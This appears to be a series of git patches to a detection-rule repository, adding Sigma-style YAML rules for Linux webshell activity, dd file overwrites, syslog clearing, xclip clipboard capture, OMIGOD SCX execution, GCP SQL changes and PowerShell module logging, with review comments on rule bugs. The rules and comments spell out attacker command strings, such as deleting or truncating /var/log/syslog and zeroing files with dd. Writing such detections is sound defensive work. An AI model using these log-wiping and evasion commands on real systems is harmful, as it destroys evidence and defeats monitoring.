+0200 Subject: [PATCH 1235/1367] rule: first Linux process_creation rule --- .../lnx_webshell_detection.yml | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 rules/linux/process_creation/lnx_webshell_detection.yml diff --git a/rules/linux/process_creation/lnx_webshell_detection.yml b/rules/linux/process_creation/lnx_webshell_detection.yml new file mode 100644 index 00000000..a4a34298 --- /dev/null +++ b/rules/linux/process_creation/lnx_webshell_detection.yml 
@@ -0,0 +1,42 @@ +title: Linux Webshell Indicators +id: 818f7b24-0fba-4c49-a073-8b755573b9c7 +status: experimental +description: Detects suspicious sub processes of web server processes +references: + - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ +date: 2021/10/15 +author: Florian Roth +tags: + - attack.persistence + - attack.t1100 # an old one + - attack.t1505.003 +logsource: + product: linux + category: process_creation +detection: + selection_sub_processes: + Image|endswith: + - '/whoami' + - '/ifconfig' + - '/usr/bin/ip' + - '/bin/uname' + selection_general: + ParentImage|endswith: + - '/httpd' + - '/lighttpd' + - '/nginx' + - '/apache2' + - '/node' + selection_tomcat: + ParentCommandLine|contains|all: + - '/bin/java' + - 'tomcat' + selection_websphere: # ? just guessing + ParentCommandLine|contains|all: + - '/bin/java' + - 'websphere' + condition: selection_sub_processes and ( selection_general or selection_tomcat ) +falsepositives: + - Web applications that try to figure out the user that runs the web service +level: critical + From 5a144e186483ef9b883428d2c5e57674f7a9e7a2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 15 Oct 2021 14:46:13 +0200 Subject: [PATCH 1236/1367] sysmon for linux - process_creation mapping --- tools/config/generic/sysmon.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/tools/config/generic/sysmon.yml b/tools/config/generic/sysmon.yml index da857d68..d7fc8989 100644 --- a/tools/config/generic/sysmon.yml +++ b/tools/config/generic/sysmon.yml @@ -9,6 +9,14 @@ logsources: rewrite: product: windows service: sysmon + process_creation_linux: + category: process_creation + product: linux + conditions: + EventID: 1 + rewrite: + product: linux + service: sysmon file_change: category: file_change product: windows From 8ee9d2f5b4a073ef5ddf9f69c6a9d5de669dd7cc Mon Sep 17 00:00:00 2001 
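Review bot: `selection_websphere` is defined but never referenced by `condition: selection_sub_processes and ( selection_general or selection_tomcat )`, so WebSphere parents are silently never matched and the repository's rule tests may flag the unused selection; either reference it, `condition: selection_sub_processes and ( selection_general or selection_tomcat or selection_websphere )`, or remove the block until it is validated. `Image|endswith: '/usr/bin/ip'` is also narrower than its siblings: on Debian/Ubuntu `ip` is installed as `/sbin/ip` (and `/bin/ip` on merged-usr systems), so the reconnaissance case this rule targets is missed there; `- '/ip'` would cover all locations, or list `/sbin/ip` and `/bin/ip` explicitly if a bare suffix is judged too loose.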
From: Florian Roth Date: Fri, 15 Oct 2021 15:12:44 +0200 Subject: [PATCH 1237/1367] docs: changes in description --- rules/linux/process_creation/lnx_webshell_detection.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/lnx_webshell_detection.yml b/rules/linux/process_creation/lnx_webshell_detection.yml index a4a34298..21861818 100644 --- a/rules/linux/process_creation/lnx_webshell_detection.yml +++ b/rules/linux/process_creation/lnx_webshell_detection.yml @@ -37,6 +37,6 @@ detection: - 'websphere' condition: selection_sub_processes and ( selection_general or selection_tomcat ) falsepositives: - - Web applications that try to figure out the user that runs the web service + - Web applications that invoke Linux command line tools level: critical From ca99394e460d734d2738f6e925ea0a4842a82aea Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:28:15 -0400 Subject: [PATCH 1238/1367] detect overwriting and deletion of files via dd --- .../process_creation/dd_file_overwrite.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/linux/process_creation/dd_file_overwrite.yml diff --git a/rules/linux/process_creation/dd_file_overwrite.yml b/rules/linux/process_creation/dd_file_overwrite.yml new file mode 100644 index 00000000..8fe6ce2d --- /dev/null +++ b/rules/linux/process_creation/dd_file_overwrite.yml 
@@ -0,0 +1,26 @@ +title: DD File Overwrite +id: 2953194b-e33c-4859-b9e8-05948c167447 +status: experimental +description: Detects potential overwriting and deletion of a file using DD. +status: experimental +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.impact + - attack.t1485 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd +logsource: + product: linux + category: process_creation +detection: + selection: + Image: '/bin/dd' + CommandLine|contains: 'of=' + CommandLine|contains: + - 'if=/dev/zero' + - 'if=/dev/null' + condition: selection +falsepositives: + - Any user deleting files that way. +level: low \ No newline at end of file From f8cb0883d5357d871c0dd32b8189fe4175f6c624 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:38:09 -0400 Subject: [PATCH 1239/1367] OMI SCX Execute RunAsProvider rules --- ...omigod_scx_runasprovider_executescript.yml | 31 +++++++++++++++++++ ..._scx_runasprovider_executeshellcommand.yml | 31 +++++++++++++++++++ 2 files changed, 62 insertions(+) create mode 100644 rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml create mode 100644 rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml diff --git a/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml b/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml new file mode 100644 index 00000000..308c92d4 --- /dev/null +++ b/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml 
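Review bot: `selection` uses the key `CommandLine|contains` twice in one mapping, and YAML does not allow duplicate keys: PyYAML keeps the last occurrence, so the `of=` constraint is silently dropped and the rule fires on any `dd` whose command line mentions `if=/dev/zero` or `if=/dev/null`; put each constraint in its own selection (`selection_of`, `selection_if`) and `and` them in the condition. `Image: '/bin/dd'` is an exact match that will miss `/usr/bin/dd` on merged-/usr distributions if the sensor reports the resolved path; the `at_command` rule in the same series uses the `Image|endswith` form, so `Image|endswith: '/dd'` keeps the rules consistent. The file also declares `status: experimental` twice, another duplicate key.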
@@ -0,0 +1,31 @@ +title: OMIGOD SCX RunAsProvider ExecuteScript +id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db +status: experimental +description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +status: experimental +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml +logsource: + product: linux + category: process_creation +detection: + selection: + user: root + LogonId: '0' + CurrentDirectory: '/var/opt/microsoft/scx/tmp' + CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider ExecuteScript. +level: high \ No newline at end of file diff --git a/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml new file mode 100644 index 00000000..34d3c7f3 --- /dev/null +++ b/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml 
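Review bot: The field `user` is lowercase while every other field in this rule and its sibling Linux process_creation rules is CamelCase (`Image`, `CommandLine`, `CurrentDirectory`); the Windows process_creation schema names the account field `User`, so unless the Sysmon-for-Linux config maps `user` the selection will not translate and the root constraint is lost — please confirm the field name against the config before this leaves experimental. `LogonId: '0'` is a quoted string; if the backend stores LogonId as a number the exact match fails, so check how the source emits it. The description also reads "Microsoft Operations Manager. Microsoft Azure, and ..." where a comma was intended.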
@@ -0,0 +1,31 @@ +title: OMIGOD SCX RunAsProvider ExecuteShellCommand +id: 21541900-27a9-4454-9c4c-3f0a4240344a +status: experimental +description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +status: experimental +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml +logsource: + product: linux + category: process_creation +detection: + selection: + user: root + LogonId: '0' + CurrentDirectory: '/var/opt/microsoft/scx/tmp' + CommandLine|contains: '/bin/sh' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. +level: high \ No newline at end of file From aa0a5b820466a3f3bcde9a93bbec13d5e6689872 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:43:42 -0400 Subject: [PATCH 1240/1367] commands to clear or remove the syslog rule --- rules/linux/process_creation/clear_syslog.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/linux/process_creation/clear_syslog.yml diff --git a/rules/linux/process_creation/clear_syslog.yml b/rules/linux/process_creation/clear_syslog.yml new file mode 100644 index 00000000..4c57557e --- /dev/null +++ b/rules/linux/process_creation/clear_syslog.yml 
@@ -0,0 +1,29 @@ +title: Commands to Clear or Remove the Syslog +id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 +status: experimental +description: Detects specific commands commonly used to remove or empty the syslog. +status: experimental +date: 2021/10/15 +author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.impact + - attack.t1565.001 +references: + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_clear_syslog.yml +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' + condition: selection +falsepositives: + - Log rotation. +level: high \ No newline at end of file From 04ff9ae69271b7abfcd818e4c73bf19fa81d2019 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:46:59 -0400 Subject: [PATCH 1241/1367] Updated at command rule to use Image field --- rules/linux/{ => process_creation}/at_command.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/linux/{ => process_creation}/at_command.yml (94%) diff --git a/rules/linux/at_command.yml b/rules/linux/process_creation/at_command.yml similarity index 94% rename from rules/linux/at_command.yml rename to rules/linux/process_creation/at_command.yml index 81e3802e..bc79120c 100644 --- a/rules/linux/at_command.yml +++ b/rules/linux/process_creation/at_command.yml @@ -11,7 +11,7 @@ logsource: category: process_creation detection: selection: - ProcessName|endswith: + Image|endswith: - '/at' - '/atd' condition: selection From eed86077abc61ab31a5b2a52044447a9de96d9e6 Mon Sep 17 00:00:00 2001 
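Review bot: The `CommandLine|contains` list pins exact flag spellings and spacing, so `rm -fr /var/log/syslog`, `rm --force /var/log/syslog` and `truncate -s 0 /var/log/syslog` (a common way to empty a log without unlinking it) slip past, while `' > /var/log/syslog'` already catches shell truncation. Consider adding `- 'truncate -s 0 /var/log/syslog'` and `- 'rm -fr /var/log/syslog'`, or better, match `/var/log/syslog` in one selection and `Image|endswith: ['/rm', '/mv', '/truncate']` in another so the flag permutations need not be enumerated. The file also declares `status: experimental` twice, a duplicate mapping key.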
From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:59:11 -0400 Subject: [PATCH 1242/1367] updated rules schema and added Clipboard Collection with Xclip Tool --- rules/linux/process_creation/clear_syslog.yml | 1 - .../process_creation/clipboard_collection.yml | 28 +++++++++++++++++++ .../process_creation/dd_file_overwrite.yml | 1 - ...omigod_scx_runasprovider_executescript.yml | 1 - ..._scx_runasprovider_executeshellcommand.yml | 1 - 5 files changed, 28 insertions(+), 4 deletions(-) create mode 100644 rules/linux/process_creation/clipboard_collection.yml diff --git a/rules/linux/process_creation/clear_syslog.yml b/rules/linux/process_creation/clear_syslog.yml index 4c57557e..6365f46a 100644 --- a/rules/linux/process_creation/clear_syslog.yml +++ b/rules/linux/process_creation/clear_syslog.yml @@ -2,7 +2,6 @@ title: Commands to Clear or Remove the Syslog id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 status: experimental description: Detects specific commands commonly used to remove or empty the syslog. -status: experimental date: 2021/10/15 author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: diff --git a/rules/linux/process_creation/clipboard_collection.yml b/rules/linux/process_creation/clipboard_collection.yml new file mode 100644 index 00000000..d45ed949 --- /dev/null +++ b/rules/linux/process_creation/clipboard_collection.yml 
@@ -0,0 +1,28 @@ +title: Clipboard Collection with Xclip Tool +id: ec127035-a636-4b9a-8555-0efd4e59f316 +status: experimental +description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +date: 2021/10/15 +author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.impact + - attack.t1485 +references: + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml +logsource: + product: linux + category: process_creation +detection: + selection: + Image|contains: 'xclip' + CommandLine|contains: + - '-selection' + - '-sel' + CommandLine|contains: + - 'clipboard' + - 'clip' + CommandLine|contains: '-o' + condition: selection +falsepositives: + - Legitimate usage of xclip tools. +level: low \ No newline at end of file diff --git a/rules/linux/process_creation/dd_file_overwrite.yml b/rules/linux/process_creation/dd_file_overwrite.yml index 8fe6ce2d..d318c77a 100644 --- a/rules/linux/process_creation/dd_file_overwrite.yml +++ b/rules/linux/process_creation/dd_file_overwrite.yml @@ -2,7 +2,6 @@ title: DD File Overwrite id: 2953194b-e33c-4859-b9e8-05948c167447 status: experimental description: Detects potential overwriting and deletion of a file using DD. -status: experimental date: 2021/10/15 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: diff --git a/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml b/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml index 308c92d4..573b6aef 100644 --- a/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml +++ b/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml 
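Review bot: The tags `attack.impact` / `attack.t1485` (Data Destruction) appear to be copied from the dd rule and do not describe reading the clipboard; the matching ATT&CK entries are `attack.collection` and `attack.t1115` (Clipboard Data), which is what the title and description already imply — change the two tag lines to `- attack.collection` and `- attack.t1115`. Separately, `selection` repeats the `CommandLine|contains` key three times; YAML keeps only the last occurrence, so the `-selection`/`-sel` and `clipboard`/`clip` constraints are dropped and only `-o` survives, a very loose match. Split them into separate selections `and`ed in the condition.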
@@ -2,7 +2,6 @@ title: OMIGOD SCX RunAsProvider ExecuteScript id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db status: experimental description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. -status: experimental date: 2021/10/15 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: diff --git a/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml index 34d3c7f3..f53b0ff6 100644 --- a/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml +++ b/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml @@ -2,7 +2,6 @@ title: OMIGOD SCX RunAsProvider ExecuteShellCommand id: 21541900-27a9-4454-9c4c-3f0a4240344a status: experimental description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. -status: experimental date: 2021/10/15 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: From d391eccd3238ee11d09627c279145dcb6fb5a533 Mon Sep 17 00:00:00 2001 
From: Roberto Rodriguez Date: Fri, 15 Oct 2021 16:10:42 -0400 Subject: [PATCH 1243/1367] split commandline arguments in a few rules --- rules/linux/process_creation/clipboard_collection.yml | 7 +++++-- rules/linux/process_creation/dd_file_overwrite.yml | 6 ++++-- 2 files changed, 9 insertions(+), 4 deletions(-) diff --git a/rules/linux/process_creation/clipboard_collection.yml b/rules/linux/process_creation/clipboard_collection.yml index d45ed949..1055acda 100644 --- a/rules/linux/process_creation/clipboard_collection.yml +++ b/rules/linux/process_creation/clipboard_collection.yml @@ -13,16 +13,19 @@ logsource: product: linux category: process_creation detection: - selection: + selection1: Image|contains: 'xclip' + selection2: CommandLine|contains: - '-selection' - '-sel' + selection3: CommandLine|contains: - 'clipboard' - 'clip' + selection4: CommandLine|contains: '-o' - condition: selection + condition: selection1 and selection2 and selection3 and selection4 falsepositives: - Legitimate usage of xclip tools. level: low \ No newline at end of file diff --git a/rules/linux/process_creation/dd_file_overwrite.yml b/rules/linux/process_creation/dd_file_overwrite.yml index d318c77a..36808673 100644 --- a/rules/linux/process_creation/dd_file_overwrite.yml +++ b/rules/linux/process_creation/dd_file_overwrite.yml @@ -13,13 +13,15 @@ logsource: product: linux category: process_creation detection: - selection: + selection1: Image: '/bin/dd' + selection2: CommandLine|contains: 'of=' + selection3: CommandLine|contains: - 'if=/dev/zero' - 'if=/dev/null' - condition: selection + condition: selection1 and selection2 and selection3 falsepositives: - Any user deleting files that way. level: low \ No newline at end of file From 7b11987155db37d5b69647d21cee9656f813db5d Mon Sep 17 00:00:00 2001 
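Review bot: In the rewritten `selection2` and `selection3`, `'-selection'` is redundant with `'-sel'` and `'clipboard'` with `'clip'`, because `contains` on the shorter string already matches the longer one; trimming each list to the short form, `- '-sel'` and `- 'clip'`, makes the intent clearer and avoids a maintainer later "fixing" one entry without the other. This is style only; the split into separate selections correctly restores the constraints the duplicate keys had dropped.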
From: Roberto Rodriguez Date: Fri, 15 Oct 2021 16:12:51 -0400 Subject: [PATCH 1244/1367] Fixed format indentation to fix block error --- rules/linux/process_creation/clipboard_collection.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/linux/process_creation/clipboard_collection.yml b/rules/linux/process_creation/clipboard_collection.yml index 1055acda..a2d26ff3 100644 --- a/rules/linux/process_creation/clipboard_collection.yml +++ b/rules/linux/process_creation/clipboard_collection.yml @@ -13,9 +13,9 @@ logsource: product: linux category: process_creation detection: - selection1: + selection1: Image|contains: 'xclip' - selection2: + selection2: CommandLine|contains: - '-selection' - '-sel' @@ -25,7 +25,7 @@ detection: - 'clip' selection4: CommandLine|contains: '-o' - condition: selection1 and selection2 and selection3 and selection4 + condition: selection1 and selection2 and selection3 and selection4 falsepositives: - Legitimate usage of xclip tools. level: low \ No newline at end of file From 2c0e89ccc8584b59bee3ae4c8aabd2a9df87f8af Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 16:24:26 -0400 Subject: [PATCH 1245/1367] added indentation to lists per request --- rules/linux/process_creation/clear_syslog.yml | 14 +++++++------- .../process_creation/clipboard_collection.yml | 8 ++++---- rules/linux/process_creation/dd_file_overwrite.yml | 4 ++-- 3 files changed, 13 insertions(+), 13 deletions(-) diff --git a/rules/linux/process_creation/clear_syslog.yml b/rules/linux/process_creation/clear_syslog.yml index 6365f46a..44c78204 100644 --- a/rules/linux/process_creation/clear_syslog.yml +++ b/rules/linux/process_creation/clear_syslog.yml 
@@ -15,13 +15,13 @@ logsource: detection: selection: CommandLine|contains: - - 'rm /var/log/syslog' - - 'rm -r /var/log/syslog' - - 'rm -f /var/log/syslog' - - 'rm -rf /var/log/syslog' - - 'mv /var/log/syslog' - - ' >/var/log/syslog' - - ' > /var/log/syslog' + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' condition: selection falsepositives: - Log rotation. diff --git a/rules/linux/process_creation/clipboard_collection.yml b/rules/linux/process_creation/clipboard_collection.yml index a2d26ff3..f46c302f 100644 --- a/rules/linux/process_creation/clipboard_collection.yml +++ b/rules/linux/process_creation/clipboard_collection.yml @@ -17,12 +17,12 @@ detection: Image|contains: 'xclip' selection2: CommandLine|contains: - - '-selection' - - '-sel' + - '-selection' + - '-sel' selection3: CommandLine|contains: - - 'clipboard' - - 'clip' + - 'clipboard' + - 'clip' selection4: CommandLine|contains: '-o' condition: selection1 and selection2 and selection3 and selection4 diff --git a/rules/linux/process_creation/dd_file_overwrite.yml b/rules/linux/process_creation/dd_file_overwrite.yml index 36808673..1d6e3ee1 100644 --- a/rules/linux/process_creation/dd_file_overwrite.yml +++ b/rules/linux/process_creation/dd_file_overwrite.yml @@ -19,8 +19,8 @@ detection: CommandLine|contains: 'of=' selection3: CommandLine|contains: - - 'if=/dev/zero' - - 'if=/dev/null' + - 'if=/dev/zero' + - 'if=/dev/null' condition: selection1 and selection2 and selection3 falsepositives: - Any user deleting files that way. From 7fc1c509016ae7da8b29295a56b26865a9b777ab Mon Sep 17 00:00:00 2001 
From: austinsonger Date: Fri, 15 Oct 2021 18:53:45 -0500 Subject: [PATCH 1246/1367] gcp_sql_database_modified_or_deleted.yml --- .../gcp_sql_database_modified_or_deleted.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml b/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml new file mode 100644 index 00000000..ca75927f --- /dev/null +++ b/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Google Cloud SQL Database Modified or Deleted +id: f346bbd5-2c4e-4789-a221-72de7685090d +description: Detect when a Cloud SQL DB has been modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/15 +references: + - https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - cloudsql.instances.create + - cloudsql.instances.delete + - cloudsql.users.update + - cloudsql.users.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - SQL Database being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 0ca16b18f41047cdc1fa29f32239059bb6f1515b Mon Sep 17 00:00:00 2001 
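Review bot: `cloudsql.instances.create` is neither a modification nor a deletion, so it contradicts the title, description and `attack.impact` tag; either drop it or widen the title and description to "created, modified or deleted". The method list also pairs instance-level create/delete with user-level update/delete while skipping the instance modification methods the title promises (`cloudsql.instances.update` / `cloudsql.instances.patch`, if those are what your audit logs record), and the single reference cited documents only `users/update`. The second and third `falsepositives` entries are triage instructions rather than false-positive sources; keep the first and move the guidance into the description.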
From: frack113 Date: Sat, 16 Oct 2021 08:05:15 +0200 Subject: [PATCH 1247/1367] Change to category: ps_module --- .../powershell_alternate_powershell_hosts.yml | 5 ++--- .../powershell_module/powershell_bad_opsec_artifacts.yml | 5 ++--- .../powershell_clear_powershell_history.yml | 8 +++----- .../powershell_module/powershell_decompress_commands.yml | 5 ++--- .../powershell_module/powershell_get_clipboard.yml | 5 ++--- .../powershell_invoke_obfuscation_clip.yml | 5 ++--- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 8 +++----- .../powershell_invoke_obfuscation_stdin.yml | 4 ++-- .../powershell_invoke_obfuscation_var.yml | 4 ++-- .../powershell_invoke_obfuscation_via_compress.yml | 5 ++--- .../powershell_invoke_obfuscation_via_rundll.yml | 5 ++--- .../powershell_invoke_obfuscation_via_stdin.yml | 4 ++-- .../powershell_invoke_obfuscation_via_use_clip.yml | 4 ++-- .../powershell_invoke_obfuscation_via_use_mhsta.yml | 5 ++--- .../powershell_invoke_obfuscation_via_use_rundll32.yml | 5 ++--- .../powershell_invoke_obfuscation_via_var.yml | 5 ++--- .../powershell/powershell_module/powershell_powercat.yml | 5 ++--- .../powershell_remote_powershell_session.yml | 5 ++--- .../powershell_susp_athremotefxvgpudisablementcommand.yml | 8 +++----- .../powershell_module/powershell_susp_zip_compress.yml | 5 ++--- 20 files changed, 43 insertions(+), 62 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml index 0a5dc88c..cebabac1 100644 --- a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml 
@@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2021/09/21 +modified: 2021/10/16 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -13,11 +13,10 @@ tags: - attack.t1086 # an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection: - EventID: 4103 ContextInfo: '*' filter: ContextInfo|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event diff --git a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml index dc3a6cdd..b7a636ef 100644 --- a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml @@ -11,18 +11,17 @@ references: - https://www.mdeditor.tw/pl/pgRt author: 'ok @securonix invrep_de, oscd.community' date: 2020/10/09 -modified: 2021/10/07 +modified: 2021/10/16 tags: - attack.execution - attack.t1059.001 - attack.t1086 # an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|contains: - '$DoIt' - 'harmj0y' diff --git a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index 46da86f6..a13453f9 100644 --- a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml 
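Review bot: Removing `EventID: 4103` makes the rule depend entirely on a backend config that maps `category: ps_module` to that event; with a config lacking the mapping the selection degrades to `ContextInfo: '*'`, which matches every PowerShell event carrying that field, and the `filter` then only excludes powershell.exe hosts. Make sure the generic configs under tools/config define `ps_module` (rewriting to the PowerShell service with EventID 4103) in the same change, and record the dependency in the rule, e.g. `definition: PowerShell Module Logging must be enabled (ps_module maps to EventID 4103)`. The same applies to the `powershell_bad_opsec_artifacts` hunk on this line.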
@@ -6,7 +6,7 @@ related: status: experimental description: Detects keywords that could indicate clearing PowerShell history date: 2019/10/25 -modified: 2020/11/28 +modified: 2021/10/16 author: Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community references: - https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a @@ -16,11 +16,9 @@ tags: - attack.t1146 # an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: - selection_id: - EventID: 4103 selection_payload_1: Payload|contains: - 'del' @@ -33,7 +31,7 @@ detection: - 'Set-PSReadlineOption' - '–HistorySaveStyle' - 'SaveNothing' - condition: selection_id and ( selection_payload_1 or selection_payload_2 ) + condition: selection_payload_1 or selection_payload_2 falsepositives: - Legitimate PowerShell scripts level: medium diff --git a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index 5107fd70..6429b550 100644 --- a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -6,7 +6,7 @@ related: description: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. status: experimental date: 2020/05/02 -modified: 2021/10/07 +modified: 2021/10/16 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open 